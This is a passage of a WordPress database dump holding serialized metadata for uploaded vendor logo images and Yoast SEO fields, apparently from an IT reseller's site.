"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1968,1817,'_wp_attached_file','2018/12/BenQ-Logo.png'),(1969,1817,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:21:\"2018/12/BenQ-Logo.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"BenQ-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"BenQ-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"BenQ-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"BenQ-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"BenQ-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"BenQ-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:21:\"BenQ-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1970,1818,'_wp_attached_file','2018/12/Cambium-Logo.png'),(1971,1818,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:24:\"2018/12/Cambium-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Cambium-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Cambium-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Cambium-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Cambium-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"Cambium-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"Cambium-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"Cambium-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"Cambium-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1972,1819,'_wp_attached_file','2018/12/Canon-Logo.png'),(1973,1819,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:22:\"2018/12/Canon-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Canon-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Canon-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Canon-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Canon-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"Canon-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"Canon-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"Canon-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:20:\"Canon-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2107,1384,'_yoast_wpseo_content_score','60'),(2088,1374,'_thumbnail_id','3236'),(2089,1374,'_yoast_wpseo_metadesc','eSignature solutions'),(2090,1374,'_yoast_wpseo_content_score','30'),(2091,1481,'_yoast_wpseo_focuskw','DocuSign'),(2092,1481,'_yoast_wpseo_linkdex','93'),(2093,1823,'_wp_attachment_image_alt','Eset Logo'),(2094,1379,'_thumbnail_id','1823'),(2095,1379,'_yoast_wpseo_metadesc','Antivirus and Internet Security Solutions'),(2096,1379,'_yoast_wpseo_content_score','60'),(2097,1825,'_wp_attachment_image_alt','Faronics Logo'),(2098,1380,'_thumbnail_id','1825'),(2099,1380,'_yoast_wpseo_metadesc','Classroom Management, Endpoint Management'),(2100,1380,'_yoast_wpseo_content_score','60'),(2101,1826,'_wp_attachment_image_alt','Fuji Xerox Logo'),(2102,1473,'_yoast_wpseo_content_score','90'),(2103,1383,'_thumbnail_id','1826'),(2104,1383,'_yoast_wpseo_content_score','60'),(2105,1827,'_wp_attachment_image_alt','Houdini'),(2106,1384,'_thumbnail_id','1827'),(1976,1821,'_wp_attached_file','2018/12/D-Link-Logo.png'),(1977,1821,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:23:\"2018/12/D-Link-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"D-Link-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"D-Link-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"D-Link-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"D-Link-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"D-Link-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"D-Link-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:23:\"D-Link-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:21:\"D-Link-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1978,1822,'_wp_attached_file','2018/12/DocuSign-Logo.png'),(1979,1822,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:25:\"2018/12/DocuSign-Logo.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"DocuSign-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"DocuSign-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"DocuSign-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"DocuSign-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"DocuSign-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"DocuSign-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"DocuSign-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1980,1823,'_wp_attached_file','2018/12/Eset-Logo.png'),(1981,1823,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:21:\"2018/12/Eset-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Eset-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Eset-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"Eset-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"Eset-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"Eset-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"Eset-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:21:\"Eset-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:19:\"Eset-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1982,1825,'_wp_attached_file','2018/12/Faronics-Logo.png'),(1983,1825,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:25:\"2018/12/Faronics-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Faronics-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Faronics-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Faronics-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Faronics-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Faronics-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Faronics-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Faronics-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"Faronics-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1984,1826,'_wp_attached_file','2018/12/Fuji-Xerox-Logo.png'),(1985,1826,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:27:\"2018/12/Fuji-Xerox-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Fuji-Xerox-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"Fuji-Xerox-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"Fuji-Xerox-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"Fuji-Xerox-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:27:\"Fuji-Xerox-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:27:\"Fuji-Xerox-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:27:\"Fuji-Xerox-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:25:\"Fuji-Xerox-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1986,1827,'_wp_attached_file','2018/12/Houdini.png'),(1987,1827,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:19:\"2018/12/Houdini.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Houdini-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Houdini-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"Houdini-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"Houdini-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:19:\"Houdini-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:19:\"Houdini-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:19:\"Houdini-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:17:\"Houdini-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1988,1828,'_wp_attached_file','2018/12/HPE-Logo.png'),(1989,1828,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:20:\"2018/12/HPE-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"HPE-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"HPE-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"HPE-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"HPE-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:20:\"HPE-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:20:\"HPE-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:20:\"HPE-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:18:\"HPE-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1990,1829,'_wp_attached_file','2018/12/Huawei-Logo.png'),(1991,1829,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:23:\"2018/12/Huawei-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"Huawei-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Huawei-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"Huawei-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"Huawei-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"Huawei-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"Huawei-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:23:\"Huawei-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:21:\"Huawei-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1992,1830,'_wp_attached_file','2018/12/IBM-Logo.png'),(1993,1830,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:20:\"2018/12/IBM-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IBM-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IBM-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IBM-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IBM-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:20:\"IBM-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:20:\"IBM-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:20:\"IBM-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:18:\"IBM-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1994,1831,'_wp_attached_file','2018/12/LG-Logo.png'),(1995,1831,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:19:\"2018/12/LG-Logo.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"LG-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"LG-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"LG-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4: